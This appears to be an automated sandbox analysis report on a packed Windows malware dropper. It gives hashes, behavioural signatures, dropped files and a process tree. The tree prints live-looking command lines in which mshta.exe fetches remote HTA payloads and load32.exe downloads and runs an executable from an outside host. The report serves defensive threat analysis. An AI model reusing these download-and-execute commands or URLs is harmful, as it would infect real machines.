Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    01-12-2022 21:51

General

  • Target

    8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe

  • Size

    31KB

  • MD5

    5f8ea64b83d41b4bcea80bf32ae63d12

  • SHA1

    83170d02b320edb1515dca471285ede69b21f4a1

  • SHA256

    8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3

  • SHA512

    90a88bf5f1d679b1ba5d9513561ea9d0b04340fd1aa6d768126d47e774d3533c473fcdc34f0018213c7fa5985d720ff02a1ce48947c734680871357f54153dd7

  • SSDEEP

    768:5LYTkV5ms+JsN9TEzmrB12o0Of6GGkll1hh:lVksus7TESr72o0Oip+l1j

Score
10/10

Malware Config

Extracted

  • Language
    hta
  • Source
  • URLs
    hta.dropper
    http://crusade-affiliates.com/install.php?id=3c3d01f7ff6560e1f038e07d052d60d4

Extracted

  • Language
    hta
  • Source
  • URLs
    hta.dropper
    http://urodinam.net/dfgsdfsdf.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe
    "C:\Users\Admin\AppData\Local\Temp\8685b10a305b1cf9d877259e60d0bca62d3f74483671f0f9a4e0504cb2baa7a3.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4876
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://crusade-affiliates.com/install.php?id=3c3d01f7ff6560e1f038e07d052d60d4
      2⤵
      PID:1660
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://urodinam.net/dfgsdfsdf.php
      2⤵
      • Blocklisted process makes network request
      • Checks whether UAC is enabled
      PID:4800
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpp.bat" "
      2⤵
      • Checks computer location settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4260
      • C:\Users\Admin\AppData\Local\Temp\load32.exe
        C:\Users\Admin\AppData\Local\Temp\load32.exe http://0ni9o1s3feu60.cn/u4.exe C:\Users\Admin\AppData\Local\Temp\safety.exe
        3⤵
        • Executes dropped EXE
        PID:2936
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
    PID:216
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3832 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1892
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3832 CREDAT:82946 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1916

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize
    471B
    MD5
    0ff2da8bfc83bec6bce38ba6a3f7bf58
    SHA1
    84c37df7bed08d69f040c289676735c49a9564eb
    SHA256
    91026f24711c435d99a44884c7239ed1265cd17c0259a6c5885f69e4309421ea
    SHA512
    78afdc44d7557b2f14444182085252e8456c91289511d6f2abfd1d7273d05baba9a94206d370add716b9fc30dc326a1a2e1c78f642e926759d962cf216c3a489

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    Filesize
    434B
    MD5
    77ae758997c6da993d43ad668aa632f9
    SHA1
    1dd845fc393b4be4807ada2fae3224544cdbb024
    SHA256
    2d832637f11669d6f066c33ec704fc1cdabf948de22157ec2d3eb6cbfba2ce2f
    SHA512
    87b4bb4c3cc0e22d3a5d2cbc8ad9b01b7bc92e8c0dc73929c056aa292ea1e0408ccfaa13574ac2aca510d48feca8e3842286d2975ac776f9625deeffb07c6dfa

  • C:\Users\Admin\AppData\Local\Temp\load32.exe
    Filesize
    4KB
    MD5
    af40555f69da106abd8544c015d6616c
    SHA1
    dab2bbe6bdfad2d659a54f074985b9c47fe082b8
    SHA256
    5471f76a02fc0252cf9d79ae893e1b8d5635807f63cbd138ad05247f2ffce81b
    SHA512
    d3b773299bdff6b96a2480799ba28495e80d5deac9aca5c9f9310155b289a6ea8d4daab861500344bb277a90dc6e43f22bbd81de3c25088bd9a2946fc9e90bdb

  • C:\Users\Admin\AppData\Local\Temp\tmpp.bat
    Filesize
    530B
    MD5
    f77fb91e50bcc2898a78ef1462436ac4
    SHA1
    ea8be4243028d2a89043a5b64c1dd07460da6a9c
    SHA256
    7f3c2b73078001c6bfbdfa61d8d1f62822bae52dcd2726def766751bdc997d77
    SHA512
    5dfe1f934a015d4a1bda01530e6fe2d986a3fcbc5c1b709ca1fa76fb9386311cf318bf85def9364eda0e53ca241c155c057c9c8759b3bb49f272c81f4416ab78

  • memory/4876-132-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB

  • memory/4876-140-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize
    96KB